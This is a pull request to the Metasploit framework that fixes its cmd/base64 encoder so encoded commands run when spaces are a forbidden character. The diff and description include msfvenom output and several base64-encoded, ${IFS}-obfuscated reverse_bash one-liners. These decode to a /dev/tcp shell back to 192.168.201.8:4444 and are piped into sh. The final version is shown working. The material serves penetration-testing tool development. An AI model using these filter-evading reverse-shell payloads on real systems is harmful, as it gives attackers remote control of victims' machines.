### PR TITLE
BUGFIX: cmd encoder base64

### DIFF
--- a/modules/encoders/cmd/base64.rb
+++ b/modules/encoders/cmd/base64.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Encoder
     when 'base64'
       raise EncodingError if (state.badchars.bytes & '(|)'.bytes).any?
 
-      base64_decoder = '(base64 --decode || base64 -d)'
+      base64_decoder = '(base64 --decode||base64 -d)'
     when 'base64-long'
       base64_decoder = 'base64 --decode'
     when 'base64-short'
@@ -58,9 +58,9 @@ class MetasploitModule < Msf::Encoder
     else
       # find a decoder at runtime if we can use the necessary characters
       if (state.badchars.bytes & '(|)>/&'.bytes).empty?
-        base64_decoder = '((command -v base64 >/dev/null && (base64 --decode || base64 -d)) || (command -v openssl >/dev/null && openssl enc -base64 -d))'
+        base64_decoder = '((command -v base64>/dev/null&&(base64 --decode||base64 -d))||(command -v openssl>/dev/null&&openssl enc -base64 -d))'
       elsif (state.badchars.bytes & '(|)'.bytes).empty?
-        base64_decoder = '(base64 --decode || base64 -d)'
+        base64_decoder = '(base64 --decode||base64 -d)'
       else
         base64_decoder = 'openssl enc -base64 -d'
       end

--- a/modules/encoders/cmd/base64.rb
+++ b/modules/encoders/cmd/base64.rb
@@ -33,6 +33,9 @@ class MetasploitModule < Msf::Encoder
 
   #
   # Encodes the payload
+  # All unnecessary spaces from your payload inside the () are removed to avoid shell POSIX command lauguage conflicts
+  # The only things allowed after compound commands are redirections, shell keywords, and the various command separators
+  # such as (;, &, |, &&, ||)
   #
   def encode_block(state, buf)
     return buf if (buf.bytes & state.badchars.bytes).empty?


### PR DESCRIPTION
In one of my modules, I was working with the `cmd/base64` encoder in combination with badchars` \x20`
If I create a payload with `msfvenom` and run the resulting payload in the shell, it fails.
```
# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.201.8 LPORT=4444 -e cmd/base64 -b '\x20'
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/base64
cmd/base64 succeeded with size 340 (iteration=0)
cmd/base64 chosen with final size 340
Payload size: 340 bytes
echo${IFS}YmFzaCAtYyAnMDwmMTk4LTtleGVjIDE5ODw+L2Rldi90Y3AvMTkyLjE2OC4yMDEuOC80NDQ0O3NoIDwmMTk4ID4mMTk4IDI+JjE5OCc=|((command${IFS}-v${IFS}base64${IFS}>/dev/null${IFS}&&${IFS}(base64${IFS}--decode${IFS}||${IFS}base64${IFS}-d))${IFS}||${IFS}(command${IFS}-v${IFS}openssl${IFS}>/dev/null${IFS}&&${IFS}openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
```
Using `bash`
```
# echo${IFS}YmFzaCAtYyAnMDwmMTk4LTtleGVjIDE5ODw+L2Rldi90Y3AvMTkyLjE2OC4yMDEuOC80NDQ0O3NoIDwmMTk4ID4mMTk4IDI+JjE5OCc=|((command${IFS}-v${IFS}base64${IFS}>/dev/null${IFS}&&${IFS}(base64${IFS}--decode${IFS}||${IFS}base64${IFS}-d))${IFS}||${IFS}(command${IFS}-v${IFS}openssl${IFS}>/dev/null${IFS}&&${IFS}openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
-bash: syntax error near unexpected token `base64${IFS}--decode${IFS}'
```
Using `sh`
```
# echo${IFS}YmFzaCAtYyAnMDwmMTk4LTtleGVjIDE5ODw+L2Rldi90Y3AvMTkyLjE2OC4yMDEuOC80NDQ0O3NoIDwmMTk4ID4mMTk4IDI+JjE5OCc=|((command${IFS}-v${IFS}base64${IFS}>/dev/null${IFS}&&${IFS}(base64${IFS}--decode${IFS}||${IFS}base64${IFS}-d))${IFS}||${IFS}(command${IFS}-v${IFS}openssl${IFS}>/dev/null${IFS}&&${IFS}openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
sh: 2: Syntax error: word unexpected (expecting ")")
```
Did some digging and it looks like unix POSIX shells do not like the `${IFS}` following parentheses.
Examples:
```
# (pwd)&&(pwd)
/root/git/metasploit-framework
/root/git/metasploit-framework
# (pwd)${IFS}&&${IFS}(pwd)
-bash: syntax error near unexpected token `${IFS}'
# (pwd) && (pwd)
/root/git/metasploit-framework
/root/git/metasploit-framework
# (pwd${IFS}&&${IFS}pwd)
/root/git/metasploit-framework
/root/git/metasploit-framework
# sh
# (pwd)${IFS}&&${IFS}(pwd)
sh: 1: Syntax error: word unexpected
```
To fix this, remove all unnecessary spaces in your initial payload.
This works!
```
echo${IFS}YmFzaCAtYyAnMDwmNDMtO2V4ZWMgNDM8Pi9kZXYvdGNwLzE5Mi4xNjguMjAxLjgvNDQ0NDtzaCA8JjQzID4mNDMgMj4mNDMn|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
```
### Explanation ###
Checked the [POSIX shell grammar lexical conventions](https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10).  The bug sits in the way a unix POSIX shell processes the shell command language. For what I understand, you can not use a `${}` after or before compound (command) statement.
I used a utility [shellcheck](https://github.com/koalaman/shellcheck) that actually provided a bit more info on the issue.
If you run below code [online](https://www.shellcheck.net/), it gives you an explanation for this behavior.
```
#!/bin/bash
(pwd)${IFS}&& (pwd)
[SC1141](https://www.shellcheck.net/wiki/SC1141) (error): Unexpected tokens after compound command. Bad redirection or missing ;/&&/||/|?
```
[SC1141](https://www.shellcheck.net/wiki/SC1141) says:
> The only things allowed after compound commands are redirections, shell keywords, and the various command separators (;, &, |, &&, ||).

So no `${IFS}` or other shell variable expansions :-(
A quick fix is to remove all unnecessary spaces from your payload inside the `()` because you do not need them. This is nicely explained [here](https://unix.stackexchange.com/questions/526574/why-does-a-brace-command-group-need-spaces-after-the-opening-brace-in-posix-shel).

An additional advantage is that this change also makes the footprint of the payload smaller.
```
# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.201.8 LPORT=4444 -e cmd/base64 -b '\x20'
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/base64
cmd/base64 succeeded with size 280 (iteration=0)
cmd/base64 chosen with final size 280
Payload size: 280 bytes
echo${IFS}YmFzaCAtYyAnMDwmMTM0LTtleGVjIDEzNDw+L2Rldi90Y3AvMTkyLjE2OC4yMDEuOC80NDQ0O3NoIDwmMTM0ID4mMTM0IDI+JjEzNCc=|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
```